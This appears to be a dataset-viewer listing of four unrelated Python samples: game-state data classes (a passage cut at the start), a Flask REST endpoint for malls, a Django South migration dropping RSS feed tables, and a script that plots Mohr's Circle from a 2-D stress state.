                 score=0, active="ACTIVE", coord=(0, 0), speed=None):
        self.symbol = symbol      # one-character map marker (by convention)
        self.name = name
        self.team = team
        self.loyalty = loyalty
        self.energy = energy
        self.score = score
        self.active = active      # lifecycle flag; defaults to "ACTIVE"
        self.coord = coord        # (x, y) position; tuple default is safe (immutable)
        self.speed = [] if speed is None else speed
class GameStatus(object):
    """Overall game state: board metadata plus the local and remote players.

    BUG FIX: `me=GamePlayer()` and `players=[]` were evaluated once at class
    definition time, so every no-arg construction shared ONE GamePlayer and
    ONE list across all instances. `None` sentinels now create fresh objects
    per instance; explicit arguments behave exactly as before.
    """

    def __init__(self, name="", state="", size=0, map="", me=None,
                 players=None, ratio='Q', rows=0, cols=0):
        self.name = name
        self.state = state
        self.size = size
        self.map = map            # keeps the original (builtin-shadowing) parameter name for callers
        self.me = GamePlayer() if me is None else me
        self.players = [] if players is None else players
        self.ratio = ratio
        self.rows = rows
        self.cols = cols
class GameChat(object):
    """Chat view of the game: the message log plus the same fields GameStatus
    carries for context.

    BUG FIX: `messages=[]`, `players=[]` and `me=GamePlayer()` were shared
    mutable defaults — one list/instance for every no-arg construction.
    `None` sentinels now yield fresh objects per instance; explicit arguments
    behave exactly as before.
    """

    def __init__(self, messages=None, name="", state="", size=0, map="",
                 me=None, players=None):
        self.messages = [] if messages is None else messages
        self.name = name
        self.state = state
        self.size = size
        self.map = map            # keeps the original (builtin-shadowing) parameter name for callers
        self.me = GamePlayer() if me is None else me
        self.players = [] if players is None else players
class ChatAnalysis(object):
    """Result of analysing the chat log: kill counts per side and whether an
    emergency meeting is in progress."""

    def __init__(self, enemy_kills, ally_kills, is_in_emergency_meeting):
        # Plain data holder — stores each argument verbatim.
        self.is_in_emergency_meeting = is_in_emergency_meeting
        self.ally_kills = ally_kills
        self.enemy_kills = enemy_kills
class Snapshot(object):
    """Point-in-time view of the game from the local player's perspective:
    board, own position/resources, flag locations, and both rosters."""

    def __init__(self, map, map_size, me_symbol, xy_me, cell_me, xy_flag, xy_my_flag,
                 xy_players_allies, xy_players_enemies, loyalty, target, energy,
                 enemies_with_status, allies_with_status):
        # Board.
        self.map = map
        self.map_size = map_size
        # Self: identity, position, resources, current objective.
        self.me_symbol = me_symbol
        self.xy_me = xy_me
        self.cell_me = cell_me
        self.loyalty = loyalty
        self.target = target
        self.my_energy = energy  # note: attribute name differs from the parameter
        # Flags.
        self.xy_flag = xy_flag
        self.xy_my_flag = xy_my_flag
        # Other players.
        self.xy_players_allies = xy_players_allies
        self.xy_players_enemies = xy_players_enemies
        self.enemies_with_status = enemies_with_status
        self.allies_with_status = allies_with_status
|
from flask_restful import Resource
from appcode.models.mall import MallModel
class Mall(Resource):
    """REST resource for a single mall, addressed by name."""

    def get(self, name):
        """Return the mall's JSON, or a 404 payload if it does not exist."""
        mall = MallModel.find_by_name(name)
        if mall:
            return mall.json()
        return {"message": "Mall not found..."}, 404

    def post(self, name):
        """Create a mall; 400 if the name is taken, 500 on storage failure."""
        if MallModel.find_by_name(name):
            return {"message": "A mall with name '{}' already exists.".format(name)}, 400
        mall = MallModel(name)
        try:
            mall.save_to_db()
        # FIX: a bare `except:` also swallowed SystemExit/KeyboardInterrupt;
        # narrow to Exception so the process can still be interrupted.
        except Exception:
            return {"message": "An error occurred while creating the mall."}, 500
        return mall.json(), 201

    def delete(self, name):
        """Delete the mall if present; 404 when it does not exist.

        FIX: the original reported "Mall deleted." (200) even when nothing
        was deleted; a missing mall now gets an explicit 404, matching get().
        """
        mall = MallModel.find_by_name(name)
        if mall:
            mall.delete_from_db()
            return {"message": "Mall deleted."}
        return {"message": "Mall not found..."}, 404
class MallList(Resource):
    """Read-only collection endpoint listing every stored mall."""

    def get(self):
        # Serialize each persisted mall via its own json() representation.
        all_malls = MallModel.query.all()
        return {"malls": [m.json() for m in all_malls]}
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: drops the FeedPage and FeedXML tables.

    `backwards` recreates both tables so the migration can be reversed.
    The `models` dict below is South's auto-generated frozen-ORM snapshot
    (the state of the app's models at migration time) — do not edit by hand.
    """

    def forwards(self, orm):
        # Deleting model 'FeedPage'
        db.delete_table('rss_feeds_feedpage')

        # Deleting model 'FeedXML'
        db.delete_table('rss_feeds_feedxml')

    def backwards(self, orm):
        # Adding model 'FeedPage'
        db.create_table('rss_feeds_feedpage', (
            ('feed', self.gf('django.db.models.fields.related.OneToOneField')(related_name='feed_page', unique=True, to=orm['rss_feeds.Feed'])),
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('page_data', self.gf('utils.compressed_textfield.StoryField')(null=True, blank=True)),
        ))
        db.send_create_signal('rss_feeds', ['FeedPage'])

        # Adding model 'FeedXML'
        db.create_table('rss_feeds_feedxml', (
            ('feed', self.gf('django.db.models.fields.related.OneToOneField')(related_name='feed_xml', unique=True, to=orm['rss_feeds.Feed'])),
            ('rss_xml', self.gf('utils.compressed_textfield.StoryField')(null=True, blank=True)),
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ))
        db.send_create_signal('rss_feeds', ['FeedXML'])

    # Frozen ORM snapshot used by South to build the `orm` argument above.
    models = {
        'rss_feeds.duplicatefeed': {
            'Meta': {'object_name': 'DuplicateFeed'},
            'duplicate_address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'duplicate_feed_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
            'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'duplicate_addresses'", 'to': "orm['rss_feeds.Feed']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'rss_feeds.feed': {
            'Meta': {'ordering': "['feed_title']", 'object_name': 'Feed', 'db_table': "'feeds'"},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'active_subscribers': ('django.db.models.fields.IntegerField', [], {'default': '-1', 'db_index': 'True'}),
            'average_stories_per_month': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'creation': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'days_to_trim': ('django.db.models.fields.IntegerField', [], {'default': '90'}),
            'etag': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'exception_code': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'feed_address': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '255'}),
            'feed_link': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '1000', 'null': 'True', 'blank': 'True'}),
            'feed_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'fetched_once': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'has_feed_exception': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'has_page_exception': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_load_time': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'last_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'last_update': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
            'min_to_decay': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'next_scheduled_update': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
            'num_subscribers': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
            'premium_subscribers': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
            'queued_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
            'stories_last_month': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'rss_feeds.feeddata': {
            'Meta': {'object_name': 'FeedData'},
            'feed': ('utils.fields.AutoOneToOneField', [], {'related_name': "'data'", 'unique': 'True', 'to': "orm['rss_feeds.Feed']"}),
            'feed_tagline': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'popular_authors': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
            'popular_tags': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
            'story_count_history': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
        },
        'rss_feeds.feedloadtime': {
            'Meta': {'object_name': 'FeedLoadtime'},
            'date_accessed': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['rss_feeds.Feed']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'loadtime': ('django.db.models.fields.FloatField', [], {})
        },
        'rss_feeds.feedupdatehistory': {
            'Meta': {'object_name': 'FeedUpdateHistory'},
            'average_per_feed': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '1'}),
            'fetch_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'number_of_feeds': ('django.db.models.fields.IntegerField', [], {}),
            'seconds_taken': ('django.db.models.fields.IntegerField', [], {})
        }
    }

    # Apps whose migration state is completed by this migration.
    complete_apps = ['rss_feeds']
|
# Author: Agyeya Mishra
# Institute: Delhi Technological University (formerly, Delhi College of Engineering)
# Language: Python
# Version: 3.x
# Environment: PyCharm
# This script plots Mohr's Circle when given the two-dimensional state of stress.
#Importing libraries
#
# Numpy is a general-purpose array-processing package in Python.
import numpy as np
# Matplotlib is a plotting library for creating static, animated, and interactive visualizations in Python.
# Pyplot is a Matplotlib module which provides a MATLAB-like interface.
import matplotlib.pyplot as plt
import math
# Function for Mohr's Circle
def drawMohrsCircle():
    """Interactively read a 2-D stress state and plot its Mohr's Circle.

    Reads σx, σy, τxy, a unit label, and a plane angle θ from stdin, prints
    the radius, principal stresses/angles, maximum shear stress, and the
    stresses on the rotated plane, then shows the circle with matplotlib.
    """
    # Taking user input for normal stress in x-direction
    σx = float(input('Enter the value of σx = '))
    # Taking user input for normal stress in y-direction
    σy = float(input('Enter the value of σy = '))
    # Taking user input for tangential stress in xy plane
    τxy = float(input('Enter the value of τxy = '))
    # Taking user input for stress unit (display only)
    u = input('Enter the stress unit = ')
    # Taking user input for angle (in degrees) of plane's axis from x-axis
    # Here, positive angles are considered counter clockwise
    w = float(input("Enter the angle (in degrees) of plane's axis from x axis (here, +ve angles are counter clockwise), θ = "))
    θ = math.radians(w)
    # Circle radius and center (average normal stress)
    R = np.sqrt(0.25 * (σx - σy) ** 2 + (τxy) ** 2)
    σavg = (σx + σy) / 2
    # Parametric points of the circle for plotting
    ψ = np.linspace(0, 2 * np.pi, 360)
    x = σavg + R * np.cos(ψ)
    y = R * (np.sin(ψ))
    # BUG FIX: atan(2*τxy/(σx-σy)) raised ZeroDivisionError for σx == σy
    # (pure shear) and loses quadrant information; atan2 handles both.
    φ1 = math.degrees(0.5 * math.atan2(2 * τxy, σx - σy))
    φ2 = φ1 + 90
    # Normal and shear stresses on the plane rotated by θ
    σθ1 = σavg + R * np.cos(2 * np.radians(φ1) + 2 * θ)
    σθ2 = σavg + R * np.cos(2 * np.radians(φ1) + 2 * θ + np.pi)
    τθ = R * np.sin(2 * np.radians(φ1) + 2 * θ)
    print(f'''
    Radius, R = √(0.25*(σx-σy)^2 + τxy^2)
              = √(0.25*({σx}-{σy})^2 + {τxy}^2) = {R} {u}
    Average Stress, (which acts at the Center of Mohr's Circle)
    = σavg = (σx + σy)/2 = ({σx} + {σy})/2 = {σavg} {u}
    Principal Stresses:
    σ1 = σavg + R = {σavg} + {R} = {σavg + R} {u}
    σ2 = σavg - R = {σavg} - {R} = {σavg - R} {u}
    Angle which σ1 makes with the x-axis,
    φ1 = 0.5*atan2(2*τxy, σx - σy) = 0.5 * atan2(2*{τxy}, {σx} - {σy}) = {φ1} degrees
    Angle which σ2 makes with the x-axis,
    φ2 = φ1 + 90 = {φ2} degrees
    Maximum Shear Stress = τmax = R = {R} {u}
    It occurs at, α = φ1 + 45 = {φ1 + 45} degrees
    Stresses at a plane with axis at θ anticlockwise from x axis,
    σθ1 = σavg + R* Cos(2φ1 + 2θ) = {σavg} + {R}* Cos({2 * φ1 + 2 * θ})
        = {σθ1}, {u}
    σθ2 = σavg + R* Cos(2φ1 + 2θ + pi) =
        {σθ2} {u}
    τθ = R*Sin(2*φ1 + 2*θ) = {R * np.sin(2 * np.radians(φ1) + 2 * θ)} {u}
    ''')
    # Plotting Mohr's Circle: the circle, dashed axes through the center,
    # and the green diameter through the input stress state.
    plt.plot(x, y)
    plt.plot([σavg - R - 10, σavg + R + 10], [0, 0], linestyle='--', color='black')
    plt.plot([σavg, σavg], [-R - 10, R + 10], linestyle='--', color='black')
    plt.plot([σx, σy], [-τxy, τxy], [σx, σx], [-τxy, 0], [σy, σy], [τxy, 0], linestyle='-', color='green')
    plt.xlabel('σ')
    plt.ylabel('τ')
    plt.title("Mohr's Circle")
    plt.show()
# Run the interactive plot only when executed as a script, so importing
# this module does not block on input() (idiomatic main guard).
if __name__ == "__main__":
    drawMohrsCircle()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.